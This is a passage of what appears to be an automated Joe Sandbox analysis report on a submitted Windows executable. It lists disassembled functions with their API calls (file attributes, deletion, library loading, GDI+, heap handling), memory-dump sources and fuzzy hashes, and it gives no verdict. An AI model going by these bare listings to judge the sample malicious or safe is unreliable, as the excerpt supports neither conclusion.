                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2279764990-0
                                                                                                                                        • Opcode ID: d28e8dd8cbc515ef18802e09d1f7beff966bb248b1044d3e6e0ce108bb850d4c
                                                                                                                                        • Instruction ID: 9840826a2e88e499ff72685dbfc688de4bbdb184f6dda336e31edf29fdcf05d4
                                                                                                                                        • Opcode Fuzzy Hash: d28e8dd8cbc515ef18802e09d1f7beff966bb248b1044d3e6e0ce108bb850d4c
                                                                                                                                        • Instruction Fuzzy Hash: 2D115937A042259BDB299E28ECC4EDA33A5ABC4734B168220FC14EB254DF39DC41C7D1
                                                                                                                                        Function 00799AEB Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00799B21
                                                                                                                                        • GetLastError.KERNEL32 ref: 00799B2D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                        • Opcode ID: b16210dccd1e7459122fb099a9a0250fbd6532928ad070699ca749fc22347dce
                                                                                                                                        • Instruction ID: fcbb7dcb0172c700a12db1780f8ee9d8dd89c476c991a591cf72d9571b175527
                                                                                                                                        • Opcode Fuzzy Hash: b16210dccd1e7459122fb099a9a0250fbd6532928ad070699ca749fc22347dce
                                                                                                                                        • Instruction Fuzzy Hash: D00180B0705604ABFF349E69FC48B66B7D9AB84315F14463EB256C3680CA3DDC088611
                                                                                                                                        Function 00799897 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 007998EB
                                                                                                                                        • GetLastError.KERNEL32 ref: 007998F8
                                                                                                                                          • Part of subcall function 007996AA: __EH_prolog.LIBCMT ref: 007996AF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileH_prologLastPointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4236474358-0
                                                                                                                                        • Opcode ID: fecb1843d00ce178449a3340f47a1fb989f1658c2f0ec326e8e5594b2ef20044
                                                                                                                                        • Instruction ID: 17278b3a0bb635a4e8c458dac2a6ac7bc13404f8d2462d91a8fac55c4decc10f
                                                                                                                                        • Opcode Fuzzy Hash: fecb1843d00ce178449a3340f47a1fb989f1658c2f0ec326e8e5594b2ef20044
                                                                                                                                        • Instruction Fuzzy Hash: 6B01B532600205EBAF188E5DAC44DAA7769BF82330715822DEA268B291D734EC018760
                                                                                                                                        Function 007B5AEA Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 007B5B0B
                                                                                                                                          • Part of subcall function 007B59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,007B23AA,?,0000015D,?,?,?,?,007B2F29,000000FF,00000000,?,?), ref: 007B5A2E
                                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,00200000,?,?,007CCBE8,007917A1,?,?,?,?,00000000,?,00791378,?,?), ref: 007B5B47
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocAllocate_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2447670028-0
                                                                                                                                        • Opcode ID: 88a39931f4962cd726716c556999cbe499e415d61f08ecc1e590bef142182218
                                                                                                                                        • Instruction ID: ee8c5ea7f4cb534559298b3b7728a97636b102cc657c55a233d5e10a5c428568
                                                                                                                                        • Opcode Fuzzy Hash: 88a39931f4962cd726716c556999cbe499e415d61f08ecc1e590bef142182218
                                                                                                                                        • Instruction Fuzzy Hash: 47F0F672311E05E6DB312B259C05FEB3B5D9F81770F144119F8189A1A2DE3CD80081B0
                                                                                                                                        Function 0079D142 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(?,?,00000200,?), ref: 0079D187
                                                                                                                                        • LoadStringW.USER32(?,?,00000200,?), ref: 0079D19D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2948472770-0
                                                                                                                                        • Opcode ID: afa39811f132ab3b1c6874ec2dc26ea83cc3302bf19d7083b6fa79cffc425b3b
                                                                                                                                        • Instruction ID: bf0a3d932373c607f3afeeb9d679b7981382e34dfe98e58f4d30596e00adc421
                                                                                                                                        • Opcode Fuzzy Hash: afa39811f132ab3b1c6874ec2dc26ea83cc3302bf19d7083b6fa79cffc425b3b
                                                                                                                                        • Instruction Fuzzy Hash: 97F0CDB370122C7FEF229F90BC85FA77B5AEB05385F01483DFA8896061D6294C0187A8
                                                                                                                                        Function 0079FCA6 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 0079FCB3
                                                                                                                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 0079FCBA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1231390398-0
                                                                                                                                        • Opcode ID: 7601d90d180a8753eceb61a5f659aedcaa959ad659c99ac1d287763a15d7fb03
                                                                                                                                        • Instruction ID: 5be1298b02b08744964b87be3cbf775389171a4c888c9713fb25f90e6935618b
                                                                                                                                        • Opcode Fuzzy Hash: 7601d90d180a8753eceb61a5f659aedcaa959ad659c99ac1d287763a15d7fb03
                                                                                                                                        • Instruction Fuzzy Hash: 6DE09232E0010EA78F088AA4AC04EEF739DFA06200724C17AED16D3200FA3CDD4157F4
                                                                                                                                        Function 0079A0C3 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00799EF9,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 0079A0D7
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00799EF9,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 0079A108
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 643eb7fcecb290c900577b0ea95424320ab581a4e5df3d54492eff894e8d79e8
                                                                                                                                        • Instruction ID: 0127591d1c781d8deb575ff8432fe1cd7a8b63985fee79747fe91639d2ec1bf9
                                                                                                                                        • Opcode Fuzzy Hash: 643eb7fcecb290c900577b0ea95424320ab581a4e5df3d54492eff894e8d79e8
                                                                                                                                        • Instruction Fuzzy Hash: A7F0A03128110DBBDF119F60EC05BDA776DFB04381F048065B98886160DB3A9A98AAD4
                                                                                                                                        Function 007AC0D0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemText_swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3011073432-0
                                                                                                                                        • Opcode ID: e40128fdc68869a4bdfc6623cb19d2c6ec9e36221da3035100dd46349a46aae1
                                                                                                                                        • Instruction ID: 926683f9cded1019ccc6f39359db94fab1b3f369eb4d48837965e7d3bd29762f
                                                                                                                                        • Opcode Fuzzy Hash: e40128fdc68869a4bdfc6623cb19d2c6ec9e36221da3035100dd46349a46aae1
                                                                                                                                        • Instruction Fuzzy Hash: C4F05C3254420CFAEB12B7709C0AF9A3B2DA705341F004146B601920A3E53A5F218355
                                                                                                                                        Function 00799DAC Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00799611,?,?,0079946C), ref: 00799DBD
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00799611,?,?,0079946C), ref: 00799DEB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                        • Opcode ID: 4b0532a50dd2c24e5607e82479483e9a87d6519461be5ae7e2c753abf4f564fc
                                                                                                                                        • Instruction ID: 24ab79095241b41f735c993032f199282ae5f1f322d9353f4e9859a7e941a00b
                                                                                                                                        • Opcode Fuzzy Hash: 4b0532a50dd2c24e5607e82479483e9a87d6519461be5ae7e2c753abf4f564fc
                                                                                                                                        • Instruction Fuzzy Hash: 3EE0223164020DABEF109F64EC86FEA739CEB09381F844069BA88C2050EB359C909AD4
                                                                                                                                        Function 00799E13 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00799E08,?,007975A0,?,?,?,?), ref: 00799E24
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00799E08,?,007975A0,?,?,?,?), ref: 00799E50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: b6ac756afda00e516e3b4ebc973faf64d24ba5bd95e8b579b683daafbe0c6f08
                                                                                                                                        • Instruction ID: 37c1badfe974508ab47afe51bb192a327af0bab5649f6be6dbc552a73f4e4091
                                                                                                                                        • Opcode Fuzzy Hash: b6ac756afda00e516e3b4ebc973faf64d24ba5bd95e8b579b683daafbe0c6f08
                                                                                                                                        • Instruction Fuzzy Hash: 49E09233500268ABDF11AB68EC09BD9775CEB087E2F0042A5FE48E3290D7749D888BD4
                                                                                                                                        Function 0079F309 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0079F324
                                                                                                                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0079DEC8,Crypt32.dll,?,0079DF4A,?,0079DF2E,?,?,?,?), ref: 0079F346
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DirectoryLibraryLoadSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1175261203-0
                                                                                                                                        • Opcode ID: d72b6688629a724c0002696534ea1a455184be5ade01cdb8543d3eea8888d0d3
                                                                                                                                        • Instruction ID: f6e12b018c0cf5111a147448fbfa835977ec2b209c7c7f875b8f92a6dc5ad9bf
                                                                                                                                        • Opcode Fuzzy Hash: d72b6688629a724c0002696534ea1a455184be5ade01cdb8543d3eea8888d0d3
                                                                                                                                        • Instruction Fuzzy Hash: 88E01272815118E7DB11AAA4AC09FDB776CEB0D381F0440A5B948D2005DA7899908BF4
                                                                                                                                        Function 007A8924 Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007A8945
                                                                                                                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 007A894C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BitmapCreateFromGdipStream
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1918208029-0
                                                                                                                                        • Opcode ID: fed0a8e81bdd20f457c8a4f95f7e1c990305bef5f3d6e950579713b3f6b857a2
                                                                                                                                        • Instruction ID: 539b4865b301459fe12cbda61bc45ab5c3cfee7180bf3295ec9f66d355b33060
                                                                                                                                        • Opcode Fuzzy Hash: fed0a8e81bdd20f457c8a4f95f7e1c990305bef5f3d6e950579713b3f6b857a2
                                                                                                                                        • Instruction Fuzzy Hash: 58E06575500208FFC750DF84C4057AAB7E8EB05311F10816EF84593601D674AE049B92
                                                                                                                                        Function 007A909E Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GdiplusShutdown.GDIPLUS(?,?,?,007BF79B,000000FF), ref: 007A90C7
                                                                                                                                        • CoUninitialize.COMBASE(?,?,?,007BF79B,000000FF), ref: 007A90CC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: GdiplusShutdownUninitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3856339756-0
                                                                                                                                        • Opcode ID: 9bc9e1799b718967c502365e5fea8a1145aceaea7c8715cb9ca8993325fc4bee
                                                                                                                                        • Instruction ID: dc2927ba70a905edd8d4733c7653c3ce92f4bbb15088675c3b7bc5610b57ba38
                                                                                                                                        • Opcode Fuzzy Hash: 9bc9e1799b718967c502365e5fea8a1145aceaea7c8715cb9ca8993325fc4bee
                                                                                                                                        • Instruction Fuzzy Hash: 05E01A72544A44EFC711DF4CDD45F45BBE9FB49B20F0087AAB81A93B60CB386C00CA95
                                                                                                                                        Function 007B0CA6 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007B1D9A: try_get_function.LIBVCRUNTIME ref: 007B1DAF
                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007B0CC4
                                                                                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 007B0CCF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 806969131-0
                                                                                                                                        • Opcode ID: bed52420c0bb84e721105f3a08d23567f8e113aa7337b9dca28339aa211fbbea
                                                                                                                                        • Instruction ID: 01c1e5a45ba9d28c4b9c94312ed74c3af804ea1331b571d854d763f5bbfff8f4
                                                                                                                                        • Opcode Fuzzy Hash: bed52420c0bb84e721105f3a08d23567f8e113aa7337b9dca28339aa211fbbea
                                                                                                                                        • Instruction Fuzzy Hash: E6D023B5648309BD1D0037702C367DF1F4454117B57F00745F021951C1DF1C804151B6
                                                                                                                                        Function 007912C2 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemShowWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3351165006-0
                                                                                                                                        • Opcode ID: 1190eeef9e7603bf103aa6c673b3b7b604b1fcfaf621a2dbc7f8e875a1c4649e
                                                                                                                                        • Instruction ID: 33197b71b8d20c65f8b77510758a03802dafcd6302b7f4f2be23d045e26ca6b7
                                                                                                                                        • Opcode Fuzzy Hash: 1190eeef9e7603bf103aa6c673b3b7b604b1fcfaf621a2dbc7f8e875a1c4649e
                                                                                                                                        • Instruction Fuzzy Hash: 4FC012B2058204BFCB010FB0DC09C2EFBAAABA5216F00C908B4A5C00A0C23CC820DB12
                                                                                                                                        Function 0079FC30 Relevance: 2.5, APIs: 2, Instructions: 46COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(007D1E74,?,?,?,?,0079A5A0,?,?,?,?,007BF79B,000000FF), ref: 0079FC42
                                                                                                                                        • LeaveCriticalSection.KERNEL32(007D1E74,?,?,?,?,0079A5A0,?,?,?,?,007BF79B,000000FF), ref: 0079FC99
                                                                                                                                          • Part of subcall function 0079F9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0079FA05
                                                                                                                                          • Part of subcall function 0079F9D1: CloseHandle.KERNEL32(?,?), ref: 0079FA1F
                                                                                                                                          • Part of subcall function 0079F9D1: DeleteCriticalSection.KERNEL32(?), ref: 0079FA38
                                                                                                                                          • Part of subcall function 0079F9D1: CloseHandle.KERNELBASE(?), ref: 0079FA44
                                                                                                                                          • Part of subcall function 0079F9D1: CloseHandle.KERNEL32(?), ref: 0079FA50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
